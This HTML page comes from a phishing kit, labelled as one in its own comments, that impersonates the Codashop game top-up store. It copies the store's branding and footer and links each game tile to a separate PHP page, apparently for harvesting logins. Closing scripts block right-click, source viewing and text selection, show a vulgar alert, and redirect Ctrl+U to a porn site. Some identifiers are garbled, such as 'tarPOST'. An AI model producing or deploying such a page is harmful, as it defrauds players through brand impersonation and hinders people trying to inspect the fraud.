<!-- SCRIPT CODING BY : Nafis Watsiq // kontoru Tamvan-->
<!-- SCRIPT PHISING limited edition-->
<!-- Gunakan dengan bijak script ini -->
<html lang="en" >

<head>

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

  <meta charset="UTF-8">
  <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/480691731214512128/kMGr-Pn8.png"/>
  <title>Codashop</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<div class="" id="">
<div class=""></div>
<h1><a href="https://news.codashop.com/gunakan-tri-kamu-di-codashop-dan-dapatkan-bonus-kuota/?utm_source=id_codashop_banner&utm_medium=topbanner&utm_campaign=tri_5gb&_ga=2.91500122.114185824.1567263998-1396185724.1565388742" class="logo"><center>
<img style="width: 100%; height: 5%;" src="https://i.ibb.co/M6Khnr4/head.png"></a></h1>

<div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel">
  <ol class="carousel-indicators">
    <li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li>
    <li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
    <li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
	<li data-target="#carouselExampleIndicators" data-slide-to="3"></li>
	<li data-target="#carouselExampleIndicators" data-slide-to="4"></li>
	<li data-target="#carouselExampleIndicators" data-slide-to="5"></li>
  </ol>
  <div class="carousel-inner">
    <div class="carousel-item active">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/95/pubgm_2xbonus_promo11_id.jpg" class="d-block w-100" alt="gambar">
    </div>
	<div class="carousel-item">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/95/War_and_Magic_ID_Promo11.jpg" class="d-block w-100" alt="gambar">
    </div>
    <div class="carousel-item">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/94/cod_bonus45_promo10.jpg" class="d-block w-100" alt="gambar">
    </div>
    <div class="carousel-item">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/95/Crisis_Action_Codashop_Banner_promo11.jpg" class="d-block w-100" alt="gambar">
    </div>
	<div class="carousel-item">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/95/Starlight_Oct_2019_Grock_(iceland-golem)_promo.jpg" class="d-block w-100" alt="gambar">
    </div>
	<div class="carousel-item">
      <img src="https://cdn1.codashop.com/S/content/common/images/promos/94/OVO_cashback_50_promo10.jpg" class="d-block w-100" alt="gambar">
    </div>
  </div>
  <a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev">
    <span class="carousel-control-prev-icon" aria-hidden="true"></span>
    <span class="sr-only">Previous</span>
  </a>
  <a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
    <span class="carousel-control-next-icon" aria-hidden="true"></span>
    <span class="sr-only">Next</span>
  </a>
</div>

</head>
<style type='text/css'>body,a,a:link{cursor:url(http://cur.cursors-4u.net/cursors/cur-2/cur117.cur), default}a:hover{cursor:url(http://cur.cursors-4u.net/cursors/cur-2/cur116.cur),wait}</style>

				


		<!-- container -->
		<div id="container">

			

            	</a>
				<div class="section01">
                    <!-- ProductBox -->
                    
                 <style>
      /* NOTE: The styles were added inline because Prefixfree needs access to your styles and they must be inlined if they are on local disk! */
      @import url(https://fonts.googleapis.com/css?family=Raleway:400,700,500,300);
* {
  -webkit-font-smoothing: antialiased;
  box-sizing: border-box;
}

html, body {
  width: 100%;
  height: 100%;
  padding: 0;
  margin: 0;
  background-image:url('https://i.ibb.co/RgVyTnq/back.png');
}



#container {
  width: 53em;
  margin: 4em auto;
}

.plan {
  width: 17em;
  height: auto;
  background: #045FB4;
  margin: .4em 0 .4em .4em;
  float: left;
  box-shadow: 0 0 1em rgba(0, 0, 0, 0.15);
}


.plan .offer {
  height: 4.3870967742em;
  width: 100%;
  text-align: center;
  font-size: 1.8888888889em;
  line-height: 2.4;
  float: left;
  text-transform: uppercase;
  font-weight: 600;
}
.plan .list {
  width: 100%;
}
.plan .list ul {
  list-style: none;
  padding: 0;
  margin: 0;
  display: block;
  width: 100%;
  float: left;
  height: auto;
  overflow: hidden;
  background: #045FB4;
}
.plan .list ul li {
  width: 100%;
  display: block;
  height: auto;
  padding: 1.6em;
  text-align: center;
  box-shadow: inset 0 -0.15em 0 rgba(0, 0, 0, 0.1);
  color: #045FB4;
}
.plan footer {
  display: block;
  float: left;
  height: 5.7909677419em;
  width: 100%;
  background: #fff;
  border-bottom: 0.5849462366em solid #FE642E;
  padding: 1em;
}
.plan footer .button {
  display: block;
  width: 5.264516129em;
  margin: 0.1199971765em auto;
  padding: 0.1000548387em;
  text-align: center;
  text-decoration: none;
  font-size: 2.0em;
  font-weight: 500;
  border-radius: 5px;
  background-color: #045FB4;
  color: #fff;
  
}
.plan footer .button:after {
  content: "Free";
}
.plan.blue {
  background-color: #045FB4;
  color: #FAFAFA;
}
.plan.blue p:after {
  content: "Free Plan";
}
.plan.blue .list ul li:nth-child(1):after {
  content: "4 Social networks";
}
.plan.blue .list ul li:nth-child(2):after {
  content: "Statistics";
}
.plan.blue .list ul li:nth-child(3):after {
  content: "Manage your social feed";
}
.plan.green {
  background: #2ecc71;
  color: #fff;
}
.plan.green p:after {
  content: "$5/Month";
}
.plan.green .list ul li:nth-child(1):after {
  content: "Any Social networks";
}
.plan.green .list ul li:nth-child(2):after {
  content: "Statistics / 1 free domain";
}
.plan.green .list ul li:nth-child(3):after {
  content: "All social options enabled";
}
.plan.gold {
  background: #FE642E;
  color: #FE642E;
}
.plan.gold p:after {
  content: "$10/Month";
}
.plan.gold .list ul li:nth-child(1):after {
  content: "All social options enabled";
}
.plan.gold .list ul li:nth-child(2):after {
  content: "Up to 3 free domains";
}
.plan.gold .list ul li:nth-child(3):after {
  content: "Video chat + screen sharing";
}

.plan.blue .button {
  background: #8ab0c1;
}

.plan.green .button {
  background: #2ecc71;
}

.plan.gold .button {
  background: #003366;
}

@media all and (max-width: 55em) {
  #container {
    width: 100%;
  }

  .plan {
    margin: auto 0;
    box-shadow: 0 0 0 !important;
    width: 33.33%;
    font-size: .9em !important;
  }
  .plan:nth-child(1) header, .plan:nth-child(3) header {
    height: 3.8387096774em !important;
  }
  .plan:nth-child(1) header h2, .plan:nth-child(3) header h2 {
    display: none;
  }
  .plan:nth-child(2) header {
    height: 3.8387096774em !important;
  }
  .plan:nth-child(2) header h2 {
    line-height: 1;
  }

  .blue .offer {
    background: -webkit-linear-gradient(left, #8ab0c1, #8ab0c1, #8ab0c1, #8ab0c1, #2ecc71);
    background: linear-gradient(to right, #8ab0c1, #8ab0c1, #8ab0c1, #8ab0c1, #2ecc71);
  }

  .green .offer {
    background: -webkit-linear-gradient(left, #2ecc71, #2ecc71, #2ecc71, #2ecc71, #f1c40f);
    background: linear-gradient(to right, #2ecc71, #2ecc71, #2ecc71, #2ecc71, #f1c40f);
  }

  .gold .offer {
    background: -webkit-linear-gradient(left, #f1c40f, #f1c40f, #f1c40f, #f1c40f, #f1c40f);
    background: linear-gradient(to right, #f1c40f, #f1c40f, #f1c40f, #f1c40f, #f1c40f);
  }
}
@media all and (max-width: 43em) {
  #container {
    margin: 0;
  }

  .plan {
    font-size: 1em !important;
    margin: auto 0;
    box-shadow: 0 0 0 !important;
    width: 100%;
    border-bottom-size: .2em;
  }
  .plan:nth-child(2) header, .plan:nth-child(3) header {
    display: none;
  }
  .plan:nth-child(1) header {
    height: 3.8387096774em !important;
  }
  .plan:nth-child(1) header h2 {
    display: block;
    line-height: 1;
  }
  .plan footer .button {
    width: 92%;
    margin: .2em 4%;
  }

  .blue .offer {
    background: #8ab0c1;
  }

  .green .offer {
    background: #2ecc71;
  }

  .gold .offer {
    background: #f1c40f;
  }
}

    </style>

   
</head>

<body>
<font color="white" size="8" ><b>DIRECT GAME TOP-UP</b></font>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ml.php" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/mlbb_tile.jpg"></center>
  <footer>
    <a href="ml.php" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center>
    <a href="ff.php" class="logo">
   <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/freefire_tile.jpg"></center>
  <footer>
    <a href="ff.php" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center>
   <a href="cod.php" class="logo">
  <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/codmobile_tile.jpg"></center>
  <footer>
    <a href="cod.php" class="button"></a>
  </footer>
</div>


  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
 <center>
  <a href="pubg.php" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/pubg_tile.jpg"></center>
  <footer>
    <a href="pubg.php" class="button"></a>
  </footer>
</div>


<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center>
    <a href="google.php" class="logo">
   <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/gp_tile.jpg"></center>
  <footer>
    <a href="google.php" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center>
   <a href="garena.php" class="logo">
  <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/garena_shells_tile.jpg"></center>
  <footer>
    <a href="garena.php" class="button"></a>
  </footer>
</div>
  

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
 <center>
  <a href="hago.php" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/hago_tile.jpg"></center>
  <footer>
    <a href="hago.php" class="button"></a>
  </footer>
</div>


<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center>
    <a href="aov.php" class="logo">
   <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/aov_tile.jpg"></center>
  <footer>
    <a href="aov.php" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center>
   <a href="gs.php" class="logo">
  <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/speed_drifter_tile.jpg"></center>
  <footer>
    <a href="gs.php" class="button"></a>
  </footer>
</div>
  

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/lifeafter_tile.jpeg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/honkaiimpact3_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/onmyojiarena_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/ragnarok_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/ml_adventure_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/chessrush_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/pubgm_lite_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/gameofsultans_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/lumiasaga_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/last_empire_war_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/CA_New_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/rideoutheroes_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/saint_seiya_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/laplace_m_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/love_nikki_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/kingsofkings_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/higgs_domino_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/gunshipbattle_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

  <div id="container">

<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  
 <center>
 <a href="ec.html" class="logo">
 <img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/warofgenesis_tile.png"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>



<!-- Green -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
   <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/heroes_evolved_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>


<!-- Gold -->
<div class="plan gold"> 
  <header>
    <h2><span></span></h2>
  </header>
  <center><img height="200" width="272" src="https://cdn1.codashop.com/S/content/mobile/images/product-tiles/mu_origin_tile.jpg"></center>
  <footer>
    <a href="ec.html" class="button"></a>
  </footer>
</div>

</div>



				</div>

			</div>
			
<!-- footer -->
<body>
<body background = "https://s17.postimg.org/48jg72q1r/8c9ad72c1fa7edb7bf77a1231565e2d1.jpg">
	<footer id="footer_landing">
		<div class="foo_01">
			<h1 class="step">
The fastest way to POST online game credit, no credit card!</h1>
			<p class="txt">
				
If you're looking for a quick, easy, and secure way to buy online game credit without a credit card, you've come to the right place! In Codashop you can buy Steam Wallet Codes, Gemscool Vouchers, Megaxus Mi-Cash Vouchers and Skype Vouchers. The system is fast - no login or registration required. It's easy - choose your product, choose your payment method, and enter your email address. It's safe - a secure OTP will be sent to your mobile number for verification. Let's try the Codapay payment system!<br/><br/>
			</p>
		</div>

		<div class="foo_03">
			<div class="txt03" style="width: 66%;">
				<div class="FooBox">
					<p>Presented by:</p>
					<a href="https://www.codapay.com" tarPOST="_blak"><img src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/web/images/codapay.png?v=819" /></a>
				</div>
				<div class="FooBox">
					<p class="social">Dapatkan berita Coda di:</p>
					<a href="http://www.facebook.com/Codapay" tarPOST="_blak"><img src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/web/images/facebook.png?v=819" /></a>
					<a href="https://twitter.com/codashopID" tarPOST="_blak"><img src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/web/images/twitter.png?v=819" /></a>
				</div>
				<div class="customer-service">
					<h4 class="">Customer service</h4>
					<p><b><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="34474144445b464074575b505544554d59515a40471a575b59">[email&#160;protected]</a></b> <br/> <a href="https://m.me/Codapay" tarPOST="_blank"><u>Facebook messenger</u></a> <br/> +62 857 7916 0178 (Indosat) <br/> +62 813 1604 0149 (Telkomsel) <br/> +62 818 0207 4444 (XL)<br/> +62 896 43927109 (Tri) <br/> Senin - Jumat, 00:00 - 24:00 <br/> Sabtu - Minggu, 08:00 - 24:00</p>
				</div>
			</div>
			<div class="txt02">
				<a href="https://www.codapay.com/toc.php" tarPOST="_blak">Syarat & Kondisi</a>
				<p class="copy">&#169; Hak Cipta Coda Payments 2019.</p>
			</div>
		</div>
		</body>
	</footer>
	<!-- //footer -->

	<!-- dim-->
	<p class="dim" onclick="lanClose();"></p>

<script data-cfasync="false" src="/cdn-cgi/scripts/af2821b0/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/web/js/jquery-1.11.0.min.js?v=819"></script>
<script type="text/javascript" src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/common/js/jquery.cookie.js?v=819"></script>
<script type="text/javascript" src="/content/common/js/common.js"></script>

<script type="text/javascript">
$.ajaxSetup({cache: false});
$(document).ready(function (){
	var numBoxes = $(".ProductBox").size();
	if (numBoxes == 4) {
		$(".section01").attr("style","width:965px;max-width:965px");
	}

	lanSelect();
});

function lanSelect(){
	$(".header .lan a").click(function(){
		$(".header .lanPop").show();
		$(".dim").show();
	});
}

function lanClose(){
	//if($(".header .lanPop").hasClass('active')){
		$(".header .lanPop").css({'display':'none'});
		$('.dim').css({'display':'none'});
	//}
}


$('.switcher').click(function(event) {
    switchLang(event.tarPOST.id);
});

function switchLang(language){
	$.cookie("shop-lang", language, { expires : 1, path: '/' });
}

</script>

	
 </body>
<script type="text/javascript"> if (typeof document.onselectstart!="undefined") { document.onselectstart=new Function ("return false"); } else{ document.onmousedown=new Function ("return false"); document.onmouseup=new Function ("return true"); } </script > <script language=javascript> <!-- var message=" Si KONTOL Mau Maling "; /////////////////////////////////// function clickIE4(){ if (event.button==2){ alert(message); return false; } } function clickNS4(e){ if (document.layers||document.POSTElementById&&!document.all){ if (e.which==2||e.which==3){ alert(message); return false; } } } if (document.layers){ document.captureEvents(Event.MOUSEDOWN); document.onmousedown=clickNS4; } else if (document.all&&!document.POSTElementById){ document.onmousedown=clickIE4; } document.oncontextmenu=new Function("alert(message);return false") // --> </script> <script type='text/javascript'> //<![CDATA[ shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,tarPOST:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.tarPOST,"string"==typeof c.tarPOST&&(d=document.POSTElementById(c.tarPOST)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.tarPOST?e=d.tarPOST:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,tarPOST:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.tarPOST,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function() {top.location.href="http://www.bokepindo.com"}); //]]> </script> 

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>




</html>
</html>